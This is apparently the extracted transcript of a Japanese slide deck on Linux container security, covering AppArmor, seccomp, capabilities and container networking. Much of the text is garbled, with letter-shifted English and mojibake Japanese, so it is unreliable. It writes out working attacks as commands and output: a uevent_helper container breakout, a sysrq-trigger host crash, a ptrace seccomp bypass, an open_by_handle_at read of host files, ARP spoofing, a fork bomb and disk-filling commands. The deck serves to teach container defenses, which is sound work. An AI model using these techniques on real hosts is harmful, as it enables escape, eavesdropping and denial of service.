#SFBLPVUGSPN$POUBJOFS wηΩϡϦςΟػߏʹΑΔ੍ݶΛճආ͢Δ͜ͱ w୤ग़ʹ#SFBLPVU +BJMCSFBL w$POUBJOFS㲗$POUBJOFS w$POUBJOFS㲗)PTU wίϯςφͷηΩϡϦςΟػߏʹઃఆෆඋ͕͋Δͱ#SFBLPVU͕Ͱ͖ͯ͠·͏

$POUBJOFS)PTUJOH wίϯςφҰͭҰͭΛϢʔβʔʹఏڙ w)FSPLV $JSDMF$* ϚωΫϥ FUDʜ w΋͠ίϯςφ͔ΒଞͷίϯςφʹΞΫ ηεͰ͖ͨΒʜʁ w΋͠ίϯςφ͔ΒϗετʹΞΫηεͰ ͖ͨΒʜʁ

$POUBJOFS4FDVSJUZ 04Ϧιʔεͷ෼཭ 1SPDFTT pMFTZTUFN FUDʜ wDISPPUQJWPU@SPPU w-JOVY/BNFTQBDF wTFDDPNQ w-JOVY$BQBCJMJUZ wDHSPVQT
w4&-JOVY"QQ"SNPS ݖݶػೳͷ੍ݶ QFSNJTTJPO TZTDBMM 04Ϧιʔεͷ੍ݶ $16 .FNPSZ ΞΫηείϯτϩʔϧ ಛఆͷϑΝΠϧ΁ͷΞΫηεېࢭʣ

"QQ"SNPS

"QQ"SNPS wίϯςφ͸ϗετͱҰ෦ͷϑΝΠϧΛڞ༗͍ͯ͠Δ wಡΈॻ͖͕Ͱ͖ΔͱϗετʹӨڹΛٴ΅͢ϑΝΠϧ΋͋Δ wFY /proc/kcore /proc/sysrq-trigger w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSͰ੍ޚ͍ͯ͠Δ w΋͠ॻ͖ࠐΊͨ৔߹ʹͲͷΑ͏ͳ͜ͱ͕ى͜Δͷ͔͔֬ΊͯΈΑ͏ʂ

TZTLFSOFMVFWFOU@IFMQFS wuevent͸σόΠε͕௥Ճ࡟আ͞Εͨͱ͖ʹΧʔωϧ͕ૹ৴͢ΔΠϕϯτ wuevent͕ૹ৴͞Εͨͱ͖ʹɺuevent_helperʹॻ͖ࠐ·Ε͍ͯΔύεͷϓ ϩάϥϜΛ࣮ߦ͢Δ wuevent͸Ϣʔβʔϥϯυ͔Βૹ৴Մೳ •/sys/devices/virtual/mem/null/uevent •/sys/class/mem/null/uevent

-FU`T#SFBLPVU $ sudo haconiwa start sample1.haco root@sample:/# cat /root/hello.sh #
޷͖ͳΤσΟλͰॻ͖ࠐΉ #!/bin/sh echo “Hello, Host! ;)” > /tmp/hello.txt root@sample:/# chmod +x /root/hello.sh root@sample:/# echo “/var/lib/haconiwa/sample1/root/hello.sh” > /sys/kernel/uevent_helper Host Container

-FU`T#SFBLPVU $ ls /tmp/ root@sample:/# echo change > /sys/class/mem/null/uevent $
ls /tmp hello.txt $ cat /tmp/hello.txt hello host! ;) Host Container Host

QSPDTZTSRUSJHHFS root@sample1:/# echo c > /proc/sysrq-trigger Container w/proc/sysrq-triggerʹಛఆͷจࣈྻΛૹ৴͢Δ͜ͱͰϗετΛ࠶ىಈ͞ ͤͨΓΧʔωϧύχοΫΛىͨ͜͠ΓͰ͖Δ

"QQ"SNPS deny /usr/bin/top mrwklx, # top ίϚϯυͷಡΈॻ͖࣮ߦΛېࢭ wϓϩάϥϜ୯ҐͰϑΝΠϧ΍ιέοτ΁ͷڧ੍ΞΫηε੍ޚ ."$ Λߦ͏
wNSLXLMY͸ΞΫηεϞʔυΛද͠ɺS͸3FBE X͸XSJUF Y͸࣮ߦΛද͢ wIUUQNBOQBHFTVCVOUVDPNNBOQBHFTCJPOJDNBOBQQBSNPSE IUNM

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ cat apparmor/haconiwa-test … deny /usr/bin/top mrwklx, deny @{PROC}/sysrq-trigger
rwklx, … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏ Host

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/ $ sudo apparmor_parser -Kr
\ /etc/apparmor.d/haconiwa/haconiwa-test $ cat sample1.haco … config.apparmor = "haconiwa-test" … wIBDPOJXBUFTUϓϩϑΝΠϧΛTBNQMFίϯςφʹద༻ͯ͠ΈΑ͏ Host

"QQMZ"QQ"SNPS1SPpMFUP$POUBJOFS $ haconiwa start sample1.haco Host root@sample1:/# top bash: /usr/bin/top:
Permission denied root@sample1:/# echo c > /proc/sysrq-trigger bash: /proc/sysrq-trigger: Permission denied Container

"QQ"SNPS w3FBE0OMZͰϚ΢ϯτͨ͠Γɺ"QQ"SNPSʹΑͬͯίϯςφͰར༻Ͱ͖Δί Ϛϯυͷ࣮ߦ΍ϑΝΠϧ΁ͷಡΈॻ͖Λ੍ݶͰ͖Δ •/proc/sysrq-trigger •/proc/sys/kernel/core_pattern •/proc/sys/kernel/modprobe •/sys/kernel/uevent_helper

TFDDPNQ

TFDDPNQ-JOVY$BQBCJMJUZ wγεςϜίʔϧͷϑΟϧλϦϯάΛߦ͏࢓૊Έ wϗετଆʹΤεέʔϓΛڐͯ͠͠·͏Α͏ͳةݥͳγεςϜίʔϧΛ๷͙ root@sample1:/# mkdir /tmp/hoge Bad system call Container

2VJDL'VO&YBNQMF $ cat sample2.haco config.seccomp.filter(default: :allow) do |rule| rule.kill :mkdir
# mkdir(2) Λېࢭ end $ sudo haconiwa start sample2.haco root@sample1:/# mkdir /tmp/hoge Bad system call Host

TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ
ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

#ZQBTTTFDDPNQ wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

-FU`T#ZQBTT root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call
root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ Container

NLEJS TFDDPNQ Bad system call

HFUQJE TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS

QUSBDF kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax
== SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }

-JOVY$BQBCJMJUZ

wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU
ͳͲ DISPPU QUSBDF 3"8ιέοτ QJOHͳͲ SFCPPU ͱLFYFD@MPBE -JOVY$BQBCJMJUZ

&YQMPSJOH$BQBCJMJUJFT $ sudo haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING
8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms Host

2VJDL'VO&YBNQMF root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
… vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false Container

2VJDL'VO&YBNQMF $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop
"cap_net_raw" … Host

2VJDL'VO&YBNQMF $ sudo haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping:
icmp open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied Host

TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ
ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags);
struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };

PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of
f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8
IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 Host struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

3FBEUPFUDQBTTXE $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8
IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 $ sudo haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} }; Host

3FBEUPFUDQBTTXE root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin …
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false Container

%&.0 (FU4IFMM root@sample1:/# gcc get_shell.c root@sample1:/# ./a.out Container $ sudo
haconiwa start demo1.haco Host

Container Network https://flic.kr/p/7dwxjt

#SJEHF/FUXPSL w-9%͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS
$POUBJOFS #SJEHF

#SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP>
mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever Host

$POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000
4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

"314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ
4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

BSQB vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.152.207.88 (eth0)
victim | RUNNING | 10.152.207.51 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.152.207.88) at 00:16:3e:90:41:01 [ether] on lxdbr0 # attacker ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.152.207.51) at 00:16:3e:42:e8:63 [ether] on lxdbr0 # victim Host

QJOHWJDUJNDPOUBJOFS vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.152.207.51 #
victim ip PING 10.152.207.51 (10.152.207.51) 56(84) bytes of data. 64 bytes from 10.152.207.51: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.152.207.51 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms Host

"314QPPpOH root@test1:~# arpspoof -t 10.152.207.51 10.152.207.1 &> /dev/null & [1]
1619 root@test1:~# arpspoof -t 10.152.207.1 10.152.207.51 &> /dev/null & [2] 1620 Container

1PJTPOJOH vagrant@ubuntu-xenial:~$ arp -a ? (10.152.207.88) at 00:16:3e:90:41:01 [ether] on
lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.152.207.51) at 00:16:3e:90:41:01 [ether] on lxdbr0 Host

DBQUVSFQBDLFU root@test1:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl
10.152.207.51:12345 root@test2:~# nc -lvp 12345 Container Container Host

DBQUVSFQBDLFU $ lxc file pull test1/root/test.pcap ./ $ tcpdump -X
tcp port 12345 -r test.pcap 0x0000: 4500 0087 a5ee 4000 4006 e11d 0a98 cf01 E.....@.@....... 0x0010: 0a98 cf33 d856 3039 52ff 55fd 5bc5 5f47 ...3.V09R.U.[._G 0x0020: 8018 00e5 b3de 0000 0101 080a 006d f010 .............m.. 0x0030: 006d f010 4745 5420 2f20 4854 5450 2f31 .m..GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3532 .1..Host:.10.152 0x0050: 2e32 3037 2e35 313a 3132 3334 350d 0a55 .207.51:12345..U 0x0060: 7365 722d 4167 656e 743a 2063 7572 6c2f ser-Agent:.curl/ 0x0070: 372e 3437 2e30 0d0a 4163 6365 7074 3a20 7.47.0..Accept:. 0x0080: 2a2f 2a0d 0a0d 0a */*.... Host

ͦͷଞͷ"UUBDL4VSGBDF

ENFTHͷϦϯάόοϑΝಡΈग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since
last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg Container

OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop
Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry Container

'JMF%FTDSJQUPS w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋ΓɺQSPDTZTGTpMFNBYͰ ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198;
i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);

GPSLCPNCQSPDFTT $ :(){ :|: & };: $ for i in
{1..9999}; do sleep infinity & done • େྔͷϓϩηεΛੜ੒͢Δ͜ͱͰCPU΍ϝϞϦΛѹഭͤ͞ΔDoS Container Container

%JTL4QBDF $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $
dd if=/dev/zero of=tempfile bs=20GB count=10 Container Container

·ͱΊ https://flic.kr/p/9fJb3k

·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ w$7&

ҰॹʹϖύϘΛकΖ͏ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU

コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security

コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security

More Decks by KONDO Uchio

Other Decks in Technology

Featured

Transcript

コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security

コンテナのセキュリティを 中身から理解しよう / inside-out-container-and-its-security